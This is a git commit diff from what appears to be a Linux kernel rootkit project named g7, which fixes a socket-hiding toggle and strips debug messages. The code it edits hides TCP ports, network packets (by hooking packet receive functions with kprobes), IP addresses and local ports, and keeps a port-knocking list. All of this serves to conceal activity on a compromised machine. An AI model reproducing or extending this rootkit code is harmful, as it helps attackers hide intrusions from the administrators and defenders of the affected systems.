commit 3842e8e2d75b76867c6c05fb8f81e2f40c77a340
parent dbb75ac6b15a47940b8f1025c7e506489441c999
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 10 Jan 2021 19:24:23 +0100
fixes socket toggling bug
Diffstat:
3 files changed, 2 insertions(+), 20 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -206,6 +206,7 @@ handle_tcphide(unsigned long arg)
hide_port((port_t)sarg, tcp4);
hide_port((port_t)sarg, tcp6);
+ rootkit.hiding_sockets = 1;
DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
}
diff --git a/src/packhide.c b/src/packhide.c
@@ -47,7 +47,6 @@ void
hide_packets(void)
{
if (atomic_inc_return(&packet_rcv_install_count) == 1) {
- DEBUG_INFO("___ HIDING PACKETS %d, %d\n", rootkit.hiding_packets, rootkit.hiding_sockets);
p_rcv.pre_handler = g7_packet_rcv;
p_rcv.post_handler = g7_post;
p_rcv.fault_handler = g7_fault;
@@ -75,7 +74,6 @@ void
unhide_packets(void)
{
if (atomic_dec_return(&packet_rcv_install_count) < 1) {
- DEBUG_INFO("___ UNHIDING PACKETS %d, %d\n", rootkit.hiding_packets, rootkit.hiding_sockets);
unregister_kprobe(&p_rcv);
unregister_kprobe(&tp_rcv);
unregister_kprobe(&p_rcv_spkt);
@@ -90,10 +88,6 @@ hide_ip(const char *ip)
u8 ipv6[16];
if (strstr(ip, ".") && in4_pton(ip, -1, ipv4, -1, NULL)) {
- int test;
- memcpy(&test, ipv4, 4);
- DEBUG_INFO("val is %0X\n", test);
-
if (!list_contains_ip(&hidden_ips, ipv4, v4)) {
memcpy(ipv4 + 4, (ip_t){ 0 }, 12);
add_ip_to_list(hidden_ips_tail, ipv4, v4);
diff --git a/src/porthide.c b/src/porthide.c
@@ -55,16 +55,13 @@ lport_list_t_ptr hidden_lports_tail = &hidden_lports;
void
hide_lport(lport_t lport)
{
- if (!list_contains_lport(&hidden_lports, lport)) {
- DEBUG_INFO("hiding lport %d\n", lport);
+ if (!list_contains_lport(&hidden_lports, lport))
add_lport_to_list(hidden_lports_tail, lport);
- }
}
void
unhide_lport(lport_t lport)
{
- DEBUG_INFO("unhiding lport %d\n", lport);
remove_lport_from_list(hidden_lports_tail, lport);
}
@@ -104,8 +101,6 @@ clear_hidden_lports(void)
j = hidden_lports_tail;
while ((j = remove_lport_from_list(j, j->lport)));
-
- DEBUG_INFO("cleared hidden lports and knocks\n");
}
bool
@@ -132,8 +127,6 @@ add_lport_to_list(lport_list_t_ptr tail, lport_t lport)
node = (lport_list_t_ptr)kmalloc(sizeof(lport_list_t), GFP_KERNEL);
if (node) {
- DEBUG_INFO("adding lport %d to list\n", lport);
-
node->lport = lport;
node->next = NULL;
node->prev = tail;
@@ -151,8 +144,6 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport)
lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL;
if (i && (i->lport != -1)) {
- DEBUG_INFO("removing lport %d from list\n", lport);
-
if (i->next)
i->next->prev = i->prev;
else
@@ -193,8 +184,6 @@ add_knock_to_list(knock_list_t_ptr *tail, ip_t ip, ip_version version)
node = (knock_list_t_ptr)kmalloc(sizeof(knock_list_t), GFP_KERNEL);
if (node) {
- DEBUG_INFO("adding knock to list\n");
-
memcpy(node->ip, ip, (version == v4 ? 4 : 16));
node->version = version;
node->next = NULL;
@@ -213,8 +202,6 @@ remove_knock_from_list(knock_list_t_ptr list, knock_list_t_ptr *tail, ip_t ip, i
knock_list_t_ptr i = find_knock_in_list(list, ip, version), ret = NULL;
if (i && (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && i->version != -1)) {
- DEBUG_INFO("removing knock from list\n");
-
if (i->next)
i->next->prev = i->prev;
else
